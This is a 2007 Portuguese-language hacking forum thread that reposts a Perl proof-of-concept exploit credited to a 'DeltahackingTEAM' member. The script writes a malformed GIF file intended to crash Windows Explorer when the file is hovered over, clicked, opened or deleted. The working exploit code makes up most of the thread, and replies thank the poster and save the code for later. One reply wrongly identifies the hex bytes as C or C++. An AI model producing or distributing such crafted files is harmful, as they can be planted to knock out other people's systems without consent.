[Exploit] Windows Explorer.exe DoS [.gif]

HadeS · 06 de Agosto , 2007, 11:47:43 AM

Segue abaixo o código:

#!/usr/bin/perl
###############################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net  And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com  And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";

# milw0rm.com [2007-07-23]

Esse código irá gerar a imagem GIF, que é o exploit em si.

HadeS

#phobia · 06 de Agosto , 2007, 01:18:00 PM

Massa HadeS!

Teve uma época que precisei tando disso e não achava cara...

Vlws!
Thanks!

Be.Cool · 06 de Agosto , 2007, 01:45:38 PM

lol
muito bom!
os caras sempre acham alguma brecinha pra fazer algo diferente!
vlw
codigo armazenado!

fui.

branco · 06 de Agosto , 2007, 06:24:05 PM

alguem sabe oque sao esses x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x ?
acho que tem haver com asm soh que to estudando outra coisa no momento e muito curioso pra saber oque eh isso...entao se alguem souber oque eh manda ai...

vlw t+

#phobia · 06 de Agosto , 2007, 06:39:13 PM

Citação de: "branco"alguem sabe oque sao esses x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x ?
acho que tem haver com asm soh que to estudando outra coisa no momento e muito curioso pra saber oque eh isso...entao se alguem souber oque eh manda ai...

vlw t+

Creio que seja C ou C++.

Me corrijam caso esteja errado, pois parei de codar tem muito tempo (final do ano eu começo novamente)!

OnlyOne · 23 de Agosto , 2007, 02:31:52 PM

Citação de: "phobia"
Citação de: "branco"alguem sabe oque sao esses x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x ?
acho que tem haver com asm soh que to estudando outra coisa no momento e muito curioso pra saber oque eh isso...entao se alguem souber oque eh manda ai...

vlw t+

procure por shellcode

Creio que seja C ou C++.

Me corrijam caso esteja errado, pois parei de codar tem muito tempo (final do ano eu começo novamente)!

Be.Cool · 23 de Agosto , 2007, 02:39:05 PM

Bom, eu ja tinha postado a reposta, mais como sumiu irei postar de novo ;)
vlw

fui.